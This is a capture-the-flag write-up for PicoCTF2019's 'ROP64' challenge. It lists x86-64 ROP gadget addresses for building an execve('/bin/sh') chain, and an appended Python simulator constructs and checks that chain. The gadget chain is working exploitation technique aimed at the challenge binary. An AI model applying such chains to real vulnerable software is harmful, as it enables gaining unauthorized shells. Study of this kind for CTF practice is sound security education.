ROP64 — PicoCTF2019
If you read my previous writeup about rop32, this one should be easy for you; I just need to remind you of the register state required before executing the syscall:
rax == 0x3b (59 in decimal), the execve syscall number
rdi == pointer to an address containing '/bin/sh'
rsi == NULL
rdx == NULL
Now we need to find all the suitable gadgets to chain.
### write-what-where gadget
I'm using rsi to hold the address of a writable section (here, the .data section) and rax to hold the bytes to write:
0x00000000004100d3 : pop rsi ; ret
0x00000000004156f4 : pop rax ; ret
0x000000000047f561 : mov qword ptr [rsi], rax ; ret
### initiate syscall gadgets (set rax)
0x0000000000444c50 : xor rax, rax ; ret
0x00000000004749c0 : add rax, 1 ; ret
### initiate syscall argument gadgets (set rdi, null rsi and rdx)
0x00000000004499b5 : pop rdx ; ret
0x00000000004100d3 : pop rsi ; ret
0x0000000000400686 : pop rdi ; ret
### syscall gadget
0x000000000040123c : syscall
### chaining gadgets
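As an added example (not part of the original writeup), here is a small Python simulator of the gadget semantics listed above: it walks the stack words in the order the sections describe and checks that rax, rdi, rsi and rdx are in the execve state before the syscall gadget is reached. DATA_ADDR is an assumed placeholder for the writable .data slot, which the writeup does not give, and the chain is listed without the padding that precedes the overwritten return address.

```python
import struct

DATA_ADDR = 0x4b0000  # assumption: placeholder for a writable .data slot (not from the writeup)

# Gadget address -> (mnemonic, registers it pops from the stack); addresses are the writeup's
GADGETS = {
    0x4100d3: ("pop rsi ; ret", ["rsi"]),
    0x4156f4: ("pop rax ; ret", ["rax"]),
    0x47f561: ("mov qword ptr [rsi], rax ; ret", []),
    0x444c50: ("xor rax, rax ; ret", []),
    0x4749c0: ("add rax, 1 ; ret", []),
    0x4499b5: ("pop rdx ; ret", ["rdx"]),
    0x400686: ("pop rdi ; ret", ["rdi"]),
    0x40123c: ("syscall", []),
}

def build_chain():
    """Stack words (after the padding) in the order the sections above describe."""
    binsh = struct.unpack("<Q", b"/bin/sh\x00")[0]             # exactly one qword
    chain = [0x4100d3, DATA_ADDR, 0x4156f4, binsh, 0x47f561]  # write "/bin/sh\0" into .data
    chain += [0x444c50] + [0x4749c0] * 59                      # rax = 0 + 59 = 0x3b
    chain += [0x4499b5, 0, 0x4100d3, 0, 0x400686, DATA_ADDR]   # rdx = rsi = NULL, rdi = .data
    chain += [0x40123c]                                        # syscall
    return chain

def simulate(chain):
    """Apply each gadget's effect to registers and memory until the syscall gadget runs."""
    regs = {"rax": None, "rdi": None, "rsi": None, "rdx": None}
    mem = {}
    i = 0
    while i < len(chain):
        name, pops = GADGETS[chain[i]]
        i += 1
        for reg in pops:                    # a pop consumes the next stack word
            regs[reg] = chain[i]
            i += 1
        if name.startswith("mov"):
            mem[regs["rsi"]] = regs["rax"]
        elif name.startswith("xor"):
            regs["rax"] = 0
        elif name.startswith("add"):
            regs["rax"] = (regs["rax"] + 1) & 0xffffffffffffffff
        elif name == "syscall":
            return regs, mem
    raise ValueError("chain never reaches the syscall gadget")

def check_execve_state(chain=None):
    """True when the chain reaches syscall with execve("/bin/sh", NULL, NULL) set up."""
    regs, mem = simulate(build_chain() if chain is None else chain)
    arg0 = struct.pack("<Q", mem.get(regs["rdi"], 0)).rstrip(b"\x00")
    return (regs["rax"] == 0x3b and arg0 == b"/bin/sh"
            and regs["rsi"] == 0 and regs["rdx"] == 0)
```

Note that the pop rax ; ret gadget listed for the write-what-where would also set rax to 0x3b with a single stack word, instead of xor rax, rax followed by 59 add rax, 1 gadgets.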
happy hacking !!!